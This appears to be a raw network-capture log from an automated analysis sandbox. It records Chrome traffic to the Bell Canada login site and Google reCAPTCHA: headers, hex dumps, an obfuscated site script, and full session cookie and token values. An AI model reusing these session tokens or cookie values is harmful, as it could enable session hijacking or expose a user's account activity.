                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:12:06 UTC2365INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                      Cache-Control: public, max-age=86400
                                                                                                                                                                                                                                                                                                                                      Content-Type: image/png
                                                                                                                                                                                                                                                                                                                                      Expires: Fri, 01 Nov 2024 13:12:06 GMT
                                                                                                                                                                                                                                                                                                                                      Last-Modified: Sun, 29 Aug 2021 15:37:57 GMT
                                                                                                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                      ETag: "1D79CEBD70E3880"
                                                                                                                                                                                                                                                                                                                                      X-Generated-By: Q-BC036
                                                                                                                                                                                                                                                                                                                                      Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                                                                                      Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                                                                                                                                                                                                                                                                                                      X-XSS-Protection: 1
                                                                                                                                                                                                                                                                                                                                      Content-Security-Policy: frame-ancestors bell.ca *.bell.ca *.bellmts.ca *.virginmobile.ca *.virginplus.ca *.vm.ca *.vmobile.ca *.vmcanada.com *.thesource.ca *.luckymobile.ca *.decibelinsight.net *.decibel.com; script-src https://*.bazaarvoice.com https://*.luckymobile.ca https://www.googletagmanager.com https://sc-static.net https://assets.adobedtm.com https://*.google-analytics.com https://*.postescanada-canadapost.ca https://*.nuance.com https://*.inq.com https://connect.facebook.net https://static.ads-twitter.com https://*.twitter.com https://ssl.geoplugin.net https://s.pinimg.com https://*.google.com https://*.gstatic.com https://*.vmobile.ca https://*.googleadservices.com https://*.stackadapt.com https://*.doubleclick.net https://*.virginplus.ca https://*.bell.ca https://*.tiktok.com https://*.know-where.com https://*.korem.com https://*.googleapis.com https://*.coveo.com https://siteimproveanalytics.com https://*.licdn.com https://mybell-qc.akamaized.net https://mybell-on.akamaized.net https://vldbellsu [TRUNCATED]
                                                                                                                                                                                                                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                      Date: Thu, 31 Oct 2024 13:12:06 GMT
                                                                                                                                                                                                                                                                                                                                      Content-Length: 604
                                                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                                                      Set-Cookie: TLP409c8162028=08e8c5f15aab20004a7c68afbd9ddb24bdb02d63326013298dc54b1191bf228f40a2ce3838688ba6080f9300bc113000db0a1b8c220ec5fc314b5b9bb701a2f3ce1fa30cad5085f521b8b87063fc0e54826708331e6e900dfac6a17fe0819c18; Path=/
                                                                                                                                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:12:06 UTC604INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 29 00 00 00 23 08 06 00 00 00 09 fb 23 90 00 00 00 06 62 4b 47 44 00 ff 00 ff 00 ff a0 bd a7 93 00 00 02 11 49 44 41 54 58 85 ed 98 4d 88 4d 61 18 80 9f d7 5c 3f 31 a6 2e 65 e3 77 37 45 4a 4d cc c2 42 7e 42 29 4a d2 ec 6c 26 2b 0b 14 25 4b 65 6d 35 35 0b 16 52 c8 c2 c6 8a b2 11 a5 a4 24 32 56 a8 41 a2 a1 26 32 d4 63 71 bf 5b 77 dc 3b 35 f7 7e 67 e6 ce ad fb d4 e9 9c ef 7c df fb 9e a7 73 de f3 7d a7 13 64 a0 ee 01 46 80 c5 39 79 66 60 0a 18 8e 88 c7 a5 cc 44 3b 80 7e e0 4e be d3 34 96 00 47 80 01 20 5b 12 80 88 38 5e 44 9e 2a ea 2a e0 5b b5 bd a8 c8 e4 73 45 57 b2 28 ba 92 45 51 52 87 80 4b 34 27 fc 1a 38 3c 37 4a f5 94 80 dd c0 5a e0 5e 13 71 6f 23 42 75 6e ac fe a3 3a 4f 4e 14 3d d7 15 49 47 d4 64
                                                                                                                                                                                                                                                                                                                                      Data Ascii: PNGIHDR)##bKGDIDATXMMa\?1.ew7EJMB~B)Jl&+%Kem55R$2VA&2cq[w;5~g|s}dF9yf`D;~N4G [8^D**[sEW(EQRK4'8<7JZ^qo#Bun:ON=IGd


                                                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                      88192.168.2.949865206.47.98.2074433100C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:12:06 UTC3055OUTGET /static/bell_common.js?seed=AIBQqeKSAQAA1tX58auB8tK1poG5v7Sf7FQz5cMvgdIpF9clDWjTuQx_YjyA&lmSeL8qArw--z=q HTTP/1.1
                                                                                                                                                                                                                                                                                                                                      Host: mybell.bell.ca
                                                                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                                                                                                                      Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                                                      Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                                                                                                      Referer: https://mybell.bell.ca/Login?language=en
                                                                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                      Cookie: BSCC=LoginSplashReturnURL=%2fLogin%3flanguage%3den; 8D711C5DA4B3704F0A5FE8ED0DB141222DFC87ED6AFE3A6E5F0F7DA8B5953F07F9198C1C7587982AE5FDA2B721188A3A=false; FPID=074d78d6-7e50-4974-a9af-c4727a62784e; FPID_2=074d78d6-7e50-4974-a9af-c4727a62784e; SessionCk=e60da217-072c-41c7-969e-7adbf82ba8be; InActivityCK=d0bb8c90-fdf6-4cf3-8894-a30039ae3a23; ConsistentActivityCK=d0bb8c90-fdf6-4cf3-8894-a30039ae3a23; OmniturePageName=Login:; __eccomp=; dtCookie=v_4_srv_8_sn_20124DC10D36CDE3D1C555C55D40CA36_perc_100000_ol_0_mul_1_app-3A429b1eac4514c5ce_1_rcs-3Acss_0; CAD_Bell_ca_SS=967776428.47873.0000; Qjja3xkGs7=3789514188.64288.0000; TLTSID=759A09CF47C23CE7804C25098E01FFA8; TLTUID=26A0122B5E2EB3DDD5D9EB8E4F02EA98; TLP025e8c23=028702b9c92edae6af33052f2cad8391df3643e23d85a115a62dcd733137452f4305eb2ab8d3f82b8b13ae85a95e4a91df25ba1c299bcfdedb4de1548e72df9a4d727dc04ff7a4434f043a9549e2ae990e27c8fffcf8c51f6f45ef28d16623df71e944530154bdbbc943f1778729d75c23d5090b564224b9da5206df5702a68a73781d1fd1ececbd44594c5dd8c5b5254f6f1bde1 [TRUNCATED]
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:12:06 UTC1729INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                      Date: Thu, 31 Oct 2024 13:12:06 GMT
                                                                                                                                                                                                                                                                                                                                      Content-Type: application/javascript; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                      Content-Length: 322753
                                                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                                                      Cache-Control: public, max-age=3600, immutable
                                                                                                                                                                                                                                                                                                                                      Set-Cookie: lanAkamaPro=A5IztOKSAQAAfK0hC-Sd8xQWQaTBAexuZE_ULjNr2v-63nNi-QEd9JDirAQvAa3--k2ucgHcwH8AAEB3AAAAAA|1|0|5936127134d4a7470b6c18b8f02213c4d723e799; Path=/; Max-Age=1577847600; Domain=bell.ca; Secure
                                                                                                                                                                                                                                                                                                                                      Bell-Geo: 1
                                                                                                                                                                                                                                                                                                                                      Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                                                                                                                                                                                                                                                                                                      Set-Cookie: TLP025e8c23=028702b9c92edae6af33052f2cad8391df3643e23d85a115a62dcd733137452f4305eb2ab8d3f82b8b13ae85a95e4a91df25ba1c299bcfdedb4de1548e72df9a4d727dc04ff7a4434f043a9549e2ae990e27c8fffcf8c51f6f45ef28d16623df71e944530154bdbbc943f1778729d75c23d5090b564224b9da5206df5702a68a73781d1fd1ececbd44594c5dd8c5b5254f6f1bde1d0a0592f816ed03e81d2a7361fff6316b97ddde987648e57932628c05ca645ec1dd7f856ec66444e629d0622a68b7e2c134f284f196ea3544cf3b7c82207a54921a6555f20de00c22b2c76ebcdc53eaee7e5f6b642a0290d9cec5131cd8fb109ee0df2b3f4778939a7789ac78056fb9410029bd6003a59e231a02b1e37dbc7850fd5bd1f084ade389122c5bd439ff5038520f0b6ac30f03e31c23ca7289d6d59979f12f660f3dbeb3c0f974d1ad06761c0eda4704077fb3cf009e2239d228a2b96806fe5c793a3730769749ad8989123b; Path=/; Domain=.bell.ca; Secure; HttpOnly;
                                                                                                                                                                                                                                                                                                                                      Set-Cookie: TLP02ce4a58=028702b9c93a131f183946e5fba2da8acf4264474085a115a62dcd733137452f4305eb2ab84ad0304b853df666ee8067949b77e11784af563bbdb36d1d3f79fb6950541b57; path=/; domain=bell.ca; HttpOnly; Secure
                                                                                                                                                                                                                                                                                                                                      Set-Cookie: TLP409c8162028=08e8c5f15aab20003696217964925dcfecf242130144ba4953eb7829866056e28325a9492f02f94008e7a26f66113000208561121572f1a912a0bdefe896981147b6205068a9141e9bd3d172223b3ebf055cd6d869c32fef936a588dc452b36e; Path=/
                                                                                                                                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:12:06 UTC14655INData Raw: 28 66 75 6e 63 74 69 6f 6e 20 43 28 66 62 2c 66 64 2c 67 2c 68 29 7b 76 61 72 20 66 45 3d 52 65 66 65 72 65 6e 63 65 45 72 72 6f 72 2c 66 69 3d 54 79 70 65 45 72 72 6f 72 2c 66 6e 3d 4f 62 6a 65 63 74 2c 66 4a 3d 52 65 67 45 78 70 2c 66 72 3d 4e 75 6d 62 65 72 2c 66 4b 3d 53 74 72 69 6e 67 2c 66 4e 3d 41 72 72 61 79 2c 66 6b 3d 66 6e 2e 62 69 6e 64 2c 66 47 3d 66 6e 2e 63 61 6c 6c 2c 66 74 3d 66 47 2e 62 69 6e 64 28 66 6b 2c 66 47 29 2c 4f 3d 66 6e 2e 61 70 70 6c 79 2c 66 55 3d 66 74 28 4f 29 2c 73 3d 5b 5d 2e 70 75 73 68 2c 50 3d 5b 5d 2e 70 6f 70 2c 6a 3d 5b 5d 2e 73 6c 69 63 65 2c 4d 3d 5b 5d 2e 73 70 6c 69 63 65 2c 6d 3d 5b 5d 2e 6a 6f 69 6e 2c 52 3d 5b 5d 2e 6d 61 70 2c 76 3d 66 74 28 73 29 2c 4e 3d 66 74 28 6a 29 2c 5a 3d 66 74 28 6d 29 2c 71 3d 66
                                                                                                                                                                                                                                                                                                                                      Data Ascii: (function C(fb,fd,g,h){var fE=ReferenceError,fi=TypeError,fn=Object,fJ=RegExp,fr=Number,fK=String,fN=Array,fk=fn.bind,fG=fn.call,ft=fG.bind(fk,fG),O=fn.apply,fU=ft(O),s=[].push,P=[].pop,j=[].slice,M=[].splice,m=[].join,R=[].map,v=ft(s),N=ft(j),Z=ft(m),q=f
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:12:06 UTC16384INData Raw: 68 22 2c 22 66 4b 36 6c 5a 44 4b 61 63 67 22 2c 22 4a 4c 71 64 54 7a 45 22 2c 22 4b 68 38 71 39 62 34 77 36 75 71 35 4a 44 36 69 4f 49 6e 53 75 6b 31 31 22 2c 22 55 4f 33 49 4d 68 37 39 47 67 70 43 73 71 6b 22 2c 22 70 6d 59 2d 6f 66 38 73 73 62 65 77 41 55 62 77 58 73 49 22 2c 22 33 48 68 32 75 74 6c 46 77 6f 79 42 5a 56 5f 50 55 51 22 2c 22 44 73 53 62 22 2c 22 58 75 66 4e 43 31 49 22 2c 22 6a 75 4b 58 54 52 71 73 55 54 45 72 6b 76 70 7a 22 2c 22 71 52 74 39 76 73 4d 22 2c 22 4d 51 77 34 75 4b 67 50 6d 65 54 4c 59 58 69 49 59 70 48 6d 68 55 55 48 30 72 62 35 74 54 5a 46 52 53 4c 72 4a 2d 49 62 6f 51 54 73 74 49 55 22 2c 22 4a 4b 33 56 4b 45 32 36 4f 58 39 78 2d 67 22 2c 22 51 67 63 56 33 38 41 75 22 2c 22 51 39 79 74 61 33 61 34 5a 77 63 61 6f 73 59 68
                                                                                                                                                                                                                                                                                                                                      Data Ascii: h","fK6lZDKacg","JLqdTzE","Kh8q9b4w6uq5JD6iOInSuk11","UO3IMh79GgpCsqk","pmY-of8ssbewAUbwXsI","3Hh2utlFwoyBZV_PUQ","DsSb","XufNC1I","juKXTRqsUTErkvpz","qRt9vsM","MQw4uKgPmeTLYXiIYpHmhUUH0rb5tTZFRSLrJ-IboQTstIU","JK3VKE26OX9x-g","QgcV38Au","Q9yta3a4ZwcaosYh
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:12:06 UTC1302INData Raw: 36 6e 74 77 35 41 73 54 39 6f 65 51 73 37 55 67 6a 53 72 69 52 62 76 74 34 22 2c 22 58 37 58 55 4e 6c 6f 22 2c 22 6e 72 7a 56 50 48 69 68 49 6c 6b 22 2c 22 57 49 69 79 4d 51 47 51 4b 67 42 5a 77 38 30 48 36 67 22 2c 22 46 55 63 71 6f 61 45 43 22 2c 22 33 31 4a 73 73 66 70 59 6c 35 48 5a 56 57 58 4f 55 4f 53 55 33 53 67 46 69 41 22 2c 22 5f 6c 4d 44 79 49 39 33 22 2c 22 63 61 6c 6c 22 2c 22 71 31 39 67 36 73 34 22 2c 22 6c 58 68 61 6b 39 59 56 30 77 22 2c 22 6d 4f 48 44 62 52 7a 74 4f 42 52 68 73 76 38 73 76 33 45 33 66 75 76 7a 65 41 6f 52 65 34 36 56 22 2c 22 63 32 67 2d 79 62 34 54 79 2d 53 57 62 30 49 22 2c 22 49 71 48 2d 4d 56 5f 6b 44 48 52 42 69 72 74 7a 37 77 34 50 55 49 53 7a 50 68 63 32 22 2c 22 68 35 58 6d 45 6d 6d 77 55 41 51 38 33 73 56 45 22
                                                                                                                                                                                                                                                                                                                                      Data Ascii: 6ntw5AsT9oeQs7UgjSriRbvt4","X7XUNlo","nrzVPHihIlk","WIiyMQGQKgBZw80H6g","FUcqoaEC","31JssfpYl5HZVWXOUOSU3SgFiA","_lMDyI93","call","q19g6s4","lXhak9YV0w","mOHDbRztOBRhsv8sv3E3fuvzeAoRe46V","c2g-yb4Ty-SWb0I","IqH-MV_kDHRBirtz7w4PUISzPhc2","h5XmEmmwUAQ83sVE"
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:12:06 UTC16384INData Raw: 71 6d 63 6b 63 55 77 79 5a 61 68 34 4c 72 6f 47 75 4a 30 59 47 43 36 44 50 6d 33 35 58 61 6e 65 30 5f 44 4a 7a 39 46 46 65 70 32 77 51 79 79 66 42 37 68 2d 6e 6c 44 2d 6a 41 57 51 67 68 73 76 73 30 47 74 47 74 38 4c 65 41 37 49 42 69 63 5a 70 78 68 45 52 57 7a 4b 52 4a 6e 43 54 77 4d 31 62 35 39 37 6b 32 4c 4a 41 47 4d 77 48 47 64 54 56 52 6d 46 48 5f 77 30 71 31 53 4a 66 68 4f 6b 78 47 2d 43 5f 53 70 37 74 5f 66 76 6c 68 55 75 31 54 53 78 57 67 57 6e 5a 72 2d 51 77 52 59 73 43 66 47 54 76 6a 44 5f 52 64 63 72 52 50 69 44 50 4f 30 79 73 59 4b 52 35 73 32 4f 6d 44 36 57 6e 34 55 37 74 30 59 61 57 6e 2d 41 41 35 48 49 46 43 64 51 51 4e 41 5a 47 68 45 33 61 6c 5a 77 6e 46 7a 65 74 62 44 48 35 6f 47 36 32 37 66 39 49 6a 63 47 42 42 4c 54 6d 2d 32 34 4e 55 67
                                                                                                                                                                                                                                                                                                                                      Data Ascii: qmckcUwyZah4LroGuJ0YGC6DPm35Xane0_DJz9FFep2wQyyfB7h-nlD-jAWQghsvs0GtGt8LeA7IBicZpxhERWzKRJnCTwM1b597k2LJAGMwHGdTVRmFH_w0q1SJfhOkxG-C_Sp7t_fvlhUu1TSxWgWnZr-QwRYsCfGTvjD_RdcrRPiDPO0ysYKR5s2OmD6Wn4U7t0YaWn-AA5HIFCdQQNAZGhE3alZwnFzetbDH5oG627f9IjcGBBLTm-24NUg
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:12:06 UTC16384INData Raw: 6a 3a 5b 30 2c 31 2c 32 2c 33 2c 35 2c 36 2c 38 2c 39 2c 31 37 2c 31 38 2c 33 31 33 2c 33 35 37 5d 7d 2c 7b 5a 3a 5b 31 33 2c 31 2c 31 39 2c 38 2c 31 37 2c 32 35 5d 2c 66 3a 5b 30 2c 31 2c 32 2c 33 2c 34 2c 35 2c 36 2c 37 2c 38 2c 39 2c 31 30 2c 31 31 2c 31 32 2c 31 33 2c 31 34 2c 31 35 2c 31 36 2c 31 37 2c 31 38 2c 31 39 2c 32 30 2c 32 31 2c 32 32 2c 32 33 2c 32 34 2c 32 35 5d 2c 6a 3a 5b 38 33 2c 39 36 2c 31 30 32 2c 31 30 38 2c 31 31 35 2c 31 36 37 2c 33 33 33 5d 7d 2c 7b 5a 3a 5b 31 2c 30 5d 2c 66 3a 5b 30 2c 31 5d 2c 6a 3a 5b 5d 7d 2c 7b 5a 3a 5b 30 5d 2c 66 3a 5b 30 5d 2c 6a 3a 5b 31 33 5d 7d 2c 7b 5a 3a 5b 30 5d 2c 66 3a 5b 30 2c 32 2c 33 2c 34 5d 2c 6a 3a 5b 31 2c 32 34 35 2c 33 31 37 5d 7d 2c 7b 5a 3a 5b 30 5d 2c 66 3a 5b 30 5d 2c 6a 3a 5b 5d 7d
                                                                                                                                                                                                                                                                                                                                      Data Ascii: j:[0,1,2,3,5,6,8,9,17,18,313,357]},{Z:[13,1,19,8,17,25],f:[0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25],j:[83,96,102,108,115,167,333]},{Z:[1,0],f:[0,1],j:[]},{Z:[0],f:[0],j:[13]},{Z:[0],f:[0,2,3,4],j:[1,245,317]},{Z:[0],f:[0],j:[]}
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:12:06 UTC16384INData Raw: 35 2c 31 38 36 2c 31 38 37 2c 31 38 38 2c 31 38 39 2c 31 39 30 2c 31 39 31 2c 31 39 32 2c 31 39 33 2c 31 39 34 2c 31 39 35 2c 31 39 36 2c 31 39 37 2c 31 39 38 2c 31 39 39 2c 32 30 30 2c 32 30 31 2c 32 30 32 2c 32 30 33 2c 32 30 34 2c 32 30 35 2c 32 30 36 2c 32 30 37 2c 32 30 38 2c 32 30 39 2c 32 31 30 2c 32 31 31 2c 32 31 32 2c 32 31 33 2c 32 31 34 2c 32 31 35 2c 32 31 36 2c 32 31 37 2c 32 31 38 2c 32 31 39 2c 32 32 30 2c 32 32 31 2c 32 32 32 2c 32 32 33 2c 32 32 34 2c 32 32 35 2c 32 32 36 2c 32 32 37 2c 32 32 38 2c 32 32 39 2c 32 33 30 2c 32 33 31 2c 32 33 32 2c 32 33 33 2c 32 33 34 2c 32 33 35 2c 32 33 36 2c 32 33 37 2c 32 33 38 2c 32 33 39 2c 32 34 30 2c 32 34 31 2c 32 34 32 2c 32 34 33 2c 32 34 34 2c 32 34 35 2c 32 34 36 2c 32 34 37 2c 32 34 38 2c 32
                                                                                                                                                                                                                                                                                                                                      Data Ascii: 5,186,187,188,189,190,191,192,193,194,195,196,197,198,199,200,201,202,203,204,205,206,207,208,209,210,211,212,213,214,215,216,217,218,219,220,221,222,223,224,225,226,227,228,229,230,231,232,233,234,235,236,237,238,239,240,241,242,243,244,245,246,247,248,2
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:12:06 UTC16384INData Raw: 20 54 3d 64 2e 76 72 2e 6c 65 6e 67 74 68 2d 31 3b 64 2e 76 72 5b 54 5d 3d 62 3b 64 2e 76 72 5b 54 2b 31 5d 3d 62 7d 2c 66 75 6e 63 74 69 6f 6e 28 64 2c 54 2c 66 29 7b 76 61 72 20 47 3d 54 3b 76 61 72 20 46 3d 66 3b 76 61 72 20 6c 3d 64 2e 76 72 5b 64 2e 76 72 2e 6c 65 6e 67 74 68 2d 32 5d 3b 76 61 72 20 56 3d 64 2e 76 72 5b 64 2e 76 72 2e 6c 65 6e 67 74 68 2d 31 5d 3b 76 61 72 20 43 3d 6c 3b 76 61 72 20 6f 3d 43 28 56 29 3b 64 2e 6c 2e 76 42 28 47 2c 6f 29 3b 64 2e 76 72 5b 64 2e 76 72 2e 6c 65 6e 67 74 68 2d 32 5d 3d 64 2e 6c 2e 49 28 46 29 3b 64 2e 76 72 2e 6c 65 6e 67 74 68 2d 3d 31 7d 2c 66 75 6e 63 74 69 6f 6e 28 64 29 7b 76 61 72 20 66 3d 5b 5d 3b 66 6f 72 28 76 61 72 20 54 20 69 6e 20 64 2e 76 72 5b 64 2e 76 72 2e 6c 65 6e 67 74 68 2d 31 5d 29 7b
                                                                                                                                                                                                                                                                                                                                      Data Ascii: T=d.vr.length-1;d.vr[T]=b;d.vr[T+1]=b},function(d,T,f){var G=T;var F=f;var l=d.vr[d.vr.length-2];var V=d.vr[d.vr.length-1];var C=l;var o=C(V);d.l.vB(G,o);d.vr[d.vr.length-2]=d.l.I(F);d.vr.length-=1},function(d){var f=[];for(var T in d.vr[d.vr.length-1]){
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:12:07 UTC16384INData Raw: 3b 66 2e 76 72 5b 66 2e 76 72 2e 6c 65 6e 67 74 68 5d 3d 66 2e 6c 2e 49 28 64 29 7d 2c 66 75 6e 63 74 69 6f 6e 28 64 2c 43 2c 54 2c 66 29 7b 76 61 72 20 6b 3d 43 3b 76 61 72 20 47 3d 54 3b 76 61 72 20 46 3d 66 3b 76 61 72 20 6c 3d 64 2e 76 72 5b 64 2e 76 72 2e 6c 65 6e 67 74 68 2d 31 5d 3b 64 2e 6c 2e 76 42 28 6b 2c 6c 29 3b 76 61 72 20 56 3d 64 2e 6c 2e 49 28 47 29 3b 76 61 72 20 62 3d 64 2e 76 72 2e 6c 65 6e 67 74 68 2d 31 3b 64 2e 76 72 5b 62 5d 3d 56 3b 64 2e 76 72 5b 62 2b 31 5d 3d 64 2e 6c 2e 49 28 46 29 7d 2c 66 75 6e 63 74 69 6f 6e 28 64 2c 54 2c 66 29 7b 76 61 72 20 47 3d 54 3b 76 61 72 20 46 3d 66 3b 76 61 72 20 6f 3d 64 2e 6c 2e 49 28 46 29 3b 76 61 72 20 62 3d 47 26 6f 3b 76 61 72 20 6c 3d 64 2e 76 72 5b 64 2e 76 72 2e 6c 65 6e 67 74 68 2d 32
                                                                                                                                                                                                                                                                                                                                      Data Ascii: ;f.vr[f.vr.length]=f.l.I(d)},function(d,C,T,f){var k=C;var G=T;var F=f;var l=d.vr[d.vr.length-1];d.l.vB(k,l);var V=d.l.I(G);var b=d.vr.length-1;d.vr[b]=V;d.vr[b+1]=d.l.I(F)},function(d,T,f){var G=T;var F=f;var o=d.l.I(F);var b=G&o;var l=d.vr[d.vr.length-2
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:12:07 UTC16384INData Raw: 5f 30 55 66 70 61 56 59 41 67 46 7a 5f 2d 49 66 4e 74 70 59 41 67 48 4e 48 5f 38 5f 48 43 42 54 6c 42 5f 73 68 57 41 66 65 67 74 79 6c 6c 51 43 42 54 5a 57 4e 67 49 42 49 67 52 6d 48 30 63 4c 54 51 48 69 48 35 65 71 41 4c 30 67 58 51 4c 4a 4a 67 47 63 78 32 35 4e 41 67 66 72 47 38 64 45 4f 77 49 48 48 58 41 71 42 30 50 6c 54 67 49 48 72 67 4b 31 4b 79 6b 31 72 4f 6b 70 41 43 74 78 54 51 46 36 48 2d 73 53 78 32 35 4e 41 67 64 52 54 51 45 57 48 35 51 4f 78 47 35 4e 41 67 66 4f 55 51 48 42 42 54 54 75 79 51 48 69 48 51 49 6e 4c 65 49 45 76 73 6b 77 45 71 74 51 53 51 49 4a 44 41 6c 70 6f 5f 68 71 69 51 45 48 41 52 4a 4e 45 6d 75 70 55 41 49 46 63 77 6b 50 4a 58 47 30 67 41 43 46 41 52 63 57 48 73 52 45 4f 77 49 48 32 57 55 71 41 69 49 63 48 51 70 72 67 31 6b
                                                                                                                                                                                                                                                                                                                                      Data Ascii: _0UfpaVYAgFz_-IfNtpYAgHNH_8_HCBTlB_shWAfegtyllQCBTZWNgIBIgRmH0cLTQHiH5eqAL0gXQLJJgGcx25NAgfrG8dEOwIHHXAqB0PlTgIHrgK1Kyk1rOkpACtxTQF6H-sSx25NAgdRTQEWH5QOxG5NAgfOUQHBBTTuyQHiHQInLeIEvskwEqtQSQIJDAlpo_hqiQEHARJNEmupUAIFcwkPJXG0gACFARcWHsREOwIH2WUqAiIcHQprg1k
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:12:07 UTC16384INData Raw: 61 31 78 56 41 67 64 36 47 65 73 79 78 37 6c 54 41 67 55 67 42 41 57 6a 38 67 4f 6c 5f 55 63 43 41 67 31 63 63 6d 6c 56 41 67 58 42 41 38 63 54 56 41 49 4a 36 32 69 5a 76 51 4f 6f 44 4a 55 41 77 51 57 31 56 38 54 45 49 51 46 58 4a 77 50 47 6c 41 4f 55 63 4d 54 48 56 77 49 48 32 53 68 5a 42 5a 46 36 63 48 4b 57 56 67 49 46 56 67 57 50 4b 46 6d 72 43 49 68 70 71 30 42 56 41 67 4a 6b 41 78 52 79 5a 30 32 38 67 31 6b 43 42 53 78 4e 43 33 52 6e 64 4a 34 44 46 6d 37 45 65 6c 6b 43 42 63 58 62 64 51 41 63 55 38 64 58 41 67 65 53 35 57 45 43 53 39 31 58 47 5a 52 77 78 4d 64 58 41 67 66 5a 62 31 6b 49 6b 58 70 77 63 6e 68 57 41 67 6c 4c 33 53 37 45 50 46 63 43 41 73 30 47 69 67 69 49 5a 61 75 52 56 67 49 42 5a 41 50 6a 50 51 46 30 41 47 33 48 59 31 6b 43 42 65 74
                                                                                                                                                                                                                                                                                                                                      Data Ascii: a1xVAgd6Gesyx7lTAgUgBAWj8gOl_UcCAg1ccmlVAgXBA8cTVAIJ62iZvQOoDJUAwQW1V8TEIQFXJwPGlAOUcMTHVwIH2ShZBZF6cHKWVgIFVgWPKFmrCIhpq0BVAgJkAxRyZ028g1kCBSxNC3RndJ4DFm7EelkCBcXbdQAcU8dXAgeS5WECS91XGZRwxMdXAgfZb1kIkXpwcnhWAglL3S7EPFcCAs0GigiIZauRVgIBZAPjPQF0AG3HY1kCBet


                                                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                      89192.168.2.949863142.250.185.2284433100C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:12:06 UTC710OUTGET /recaptcha/enterprise.js?onload=getCaptchaEnterprise&hl=en&render=6LeIfTIaAAAAAHMPXsezv4PdsckDc-wAJU-eo2YP HTTP/1.1
                                                                                                                                                                                                                                                                                                                                      Host: www.google.com
                                                                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                                                                                                                      X-Client-Data: CIu2yQEIo7bJAQipncoBCNT9ygEIkqHLAQiFoM0BCLnKzQEIidPNAQip1c0BGOmYzQEY642lFw==
                                                                                                                                                                                                                                                                                                                                      Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                                                      Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                                                                                                      Referer: https://mybell.bell.ca/
                                                                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:12:06 UTC749INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                      Content-Type: text/javascript; charset=utf-8
                                                                                                                                                                                                                                                                                                                                      Expires: Thu, 31 Oct 2024 13:12:06 GMT
                                                                                                                                                                                                                                                                                                                                      Date: Thu, 31 Oct 2024 13:12:06 GMT
                                                                                                                                                                                                                                                                                                                                      Cache-Control: private, max-age=300
                                                                                                                                                                                                                                                                                                                                      Cross-Origin-Resource-Policy: cross-origin
